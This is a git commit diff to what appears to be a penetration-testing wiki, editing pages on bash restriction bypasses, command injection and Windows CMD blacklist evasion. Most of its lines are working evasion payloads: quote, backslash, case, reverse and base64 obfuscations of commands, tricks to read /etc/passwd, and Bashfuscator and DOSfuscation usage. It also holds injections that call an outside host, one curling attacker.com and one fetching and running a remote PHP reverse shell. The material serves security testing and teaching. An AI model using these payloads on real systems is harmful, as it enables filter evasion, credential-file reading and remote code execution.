GitBook: [#3532] No subject
This commit is contained in:
parent
7b172583b0
commit
58e5a59ae2
|
@ -55,15 +55,27 @@ ls *
|
|||
# [chars]
|
||||
/usr/bin/n[c] # /usr/bin/nc
|
||||
|
||||
# Quotes / Concatenation
|
||||
# Quotes
|
||||
'p'i'n'g # ping
|
||||
"w"h"o"a"m"i # whoami
|
||||
\u\n\a\m\e \-\a # uname -a
|
||||
ech''o test # echo test
|
||||
ech""o test # echo test
|
||||
bas''e64 # base64
|
||||
|
||||
#Backslashes
|
||||
\u\n\a\m\e \-\a # uname -a
|
||||
/\b\i\n/////s\h
|
||||
|
||||
# $@
|
||||
who$@ami #whoami
|
||||
|
||||
# Transformations (case, reverse, base64)
|
||||
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
|
||||
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
|
||||
$(rev<<<'imaohw') #whoami
|
||||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64
|
||||
|
||||
|
||||
# Execution through $0
|
||||
echo whoami|$0
|
||||
|
||||
|
@ -124,6 +136,12 @@ cat ${HOME:0:1}etc${HOME:0:1}passwd
|
|||
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
|
||||
```
|
||||
|
||||
### Bypass pipes
|
||||
|
||||
```bash
|
||||
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
|
||||
```
|
||||
|
||||
### Bypass with hex encoding
|
||||
|
||||
```bash
|
||||
|
@ -219,6 +237,13 @@ declare historywords
|
|||
1%0a`curl http://attacker.com`
|
||||
```
|
||||
|
||||
### Bashfuscator
|
||||
|
||||
```bash
|
||||
# From https://github.com/Bashfuscator/Bashfuscator
|
||||
./bashfuscator -c 'cat /etc/passwd'
|
||||
```
|
||||
|
||||
### RCE with 5 chars
|
||||
|
||||
```bash
|
||||
|
|
|
@ -42,22 +42,17 @@ ls %0A id # %0A Execute both (RECOMMENDED)
|
|||
`ls` # ``
|
||||
$(ls) # $()
|
||||
ls; id # ; Chain commands
|
||||
ls${LS_COLORS:10:1}${IFS}id # Might be useful
|
||||
|
||||
#Not execute but may be interesting
|
||||
> /var/www/html/out.txt #Try to redirect the output to a file
|
||||
< /etc/passwd #Try to send some input to the command
|
||||
```
|
||||
|
||||
### **Limition** Bypasses
|
||||
### Bypasses
|
||||
|
||||
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this **Bypasses:**
|
||||
If you are trying to execute **arbitrary commands inside a linux machine** you will be interesting in read about this [**WAF bypasses**](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md).
|
||||
|
||||
{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %}
|
||||
[bypass-bash-restrictions.md](../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### **Examples**
|
||||
### **Examples:**
|
||||
|
||||
```
|
||||
vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
|
||||
|
|
|
@ -447,8 +447,22 @@ net helpmsg 32 #32 is the code in that case
|
|||
### Bypass Char Blacklisting
|
||||
|
||||
```bash
|
||||
echo %HOMEPATH:~6,-11%
|
||||
\
|
||||
echo %HOMEPATH:~6,-11% #\
|
||||
who^ami #whoami
|
||||
```
|
||||
|
||||
### DOSfuscation
|
||||
|
||||
Generates an obfuscated CMD line
|
||||
|
||||
```powershell
|
||||
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
|
||||
cd Invoke-DOSfuscation
|
||||
Import-Module .\Invoke-DOSfuscation.psd1
|
||||
Invoke-DOSfuscation
|
||||
help
|
||||
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
|
||||
encoding
|
||||
```
|
||||
|
||||
### Listen address ACLs
|
||||
|
|